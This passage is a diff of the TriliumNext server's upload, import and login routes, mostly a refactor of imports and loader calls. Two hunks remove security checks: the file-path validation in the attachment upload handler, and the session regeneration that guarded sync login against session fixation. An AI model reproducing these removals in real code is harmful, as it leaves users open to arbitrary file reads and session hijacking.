 function uploadModifiedFileToNote(req: Request<{ noteId: string }>) {
     const noteId = req.params.noteId;
     const { filePath } = req.body;
 
-    validateTemporaryFilePath(filePath);
+    if (!createdTemporaryFiles.has(filePath)) {
+        throw new ValidationError(`File '${filePath}' is not a temporary file.`);
+    }
 
     const note = becca.getNoteOrThrow(noteId);
 
@@ -254,8 +230,6 @@ function uploadModifiedFileToAttachment(req: Request<{ attachmentId: string }>)
     const { attachmentId } = req.params;
     const { filePath } = req.body;
 
-    validateTemporaryFilePath(filePath);
-
     const attachment = becca.getAttachmentOrThrow(attachmentId);
 
     log.info(`Updating attachment '${attachmentId}' with content from '${filePath}'`);

apps/server/src/routes/api/import.ts

@@ -1,10 +1,9 @@
+import { becca_loader, ValidationError } from "@triliumnext/core";
 import type { Request } from "express";
 import path from "path";
 
 import becca from "../../becca/becca.js";
-import beccaLoader from "../../becca/becca_loader.js";
 import type BNote from "../../becca/entities/bnote.js";
-import ValidationError from "../../errors/validation_error.js";
 import cls from "../../services/cls.js";
 import enexImportService from "../../services/import/enex.js";
 import opmlImportService from "../../services/import/opml.js";
@@ -95,7 +94,7 @@ async function importNotesToBranch(req: Request<{ parentNoteId: string }>) {
     }
 
     // import has deactivated note events so becca is not updated, instead we force it to reload
-    beccaLoader.load();
+    becca_loader.load();
 
     return note.getPojo();
 }

apps/server/src/routes/api/login.ts

@@ -1,20 +1,18 @@
-"use strict";
-
-import options from "../../services/options.js";
-import utils from "../../services/utils.js";
-import dateUtils from "../../services/date_utils.js";
-import instanceId from "../../services/instance_id.js";
-import passwordEncryptionService from "../../services/encryption/password_encryption.js";
-import protectedSessionService from "../../services/protected_session.js";
-import appInfo from "../../services/app_info.js";
-import eventService from "../../services/events.js";
-import sqlInit from "../../services/sql_init.js";
-import sql from "../../services/sql.js";
-import ws from "../../services/ws.js";
-import etapiTokenService from "../../services/etapi_tokens.js";
+import { events as eventService, getInstanceId } from "@triliumnext/core";
 import type { Request } from "express";
-import totp from "../../services/totp";
+
+import appInfo from "../../services/app_info.js";
+import dateUtils from "../../services/date_utils.js";
+import passwordEncryptionService from "../../services/encryption/password_encryption.js";
 import recoveryCodeService from "../../services/encryption/recovery_codes";
+import etapiTokenService from "../../services/etapi_tokens.js";
+import options from "../../services/options.js";
+import protectedSessionService from "../../services/protected_session.js";
+import sql from "../../services/sql.js";
+import sqlInit from "../../services/sql_init.js";
+import totp from "../../services/totp";
+import utils from "../../services/utils.js";
+import ws from "../../services/ws.js";
 
 /**
  * @swagger
@@ -78,7 +76,7 @@ import recoveryCodeService from "../../services/encryption/recovery_codes";
  *                   type: string
  *                   example: "Auth request time is out of sync, please check that both client and server have correct time. The difference between clocks has to be smaller than 5 minutes"
  */
-async function loginSync(req: Request) {
+function loginSync(req: Request) {
     if (!sqlInit.schemaExists()) {
         return [500, { message: "DB schema does not exist, can't sync." }];
     }
@@ -112,21 +110,10 @@ async function loginSync(req: Request) {
         return [400, { message: "Sync login credentials are incorrect. It looks like you're trying to sync two different initialized documents which is not possible." }];
     }
 
-    // Regenerate session to prevent session fixation attacks.
-    await new Promise<void>((resolve, reject) => {
-        req.session.regenerate((err) => {
-            if (err) {
-                reject(err);
-            } else {
-                resolve();
-            }
-        });
-    });
-
     req.session.loggedIn = true;
 
     return {
-        instanceId: instanceId,
+        instanceId: getInstanceId(),
         maxEntityChangeId: sql.getValue("SELECT COALESCE(MAX(id), 0) FROM entity_changes WHERE isSynced = 1")
     };
 }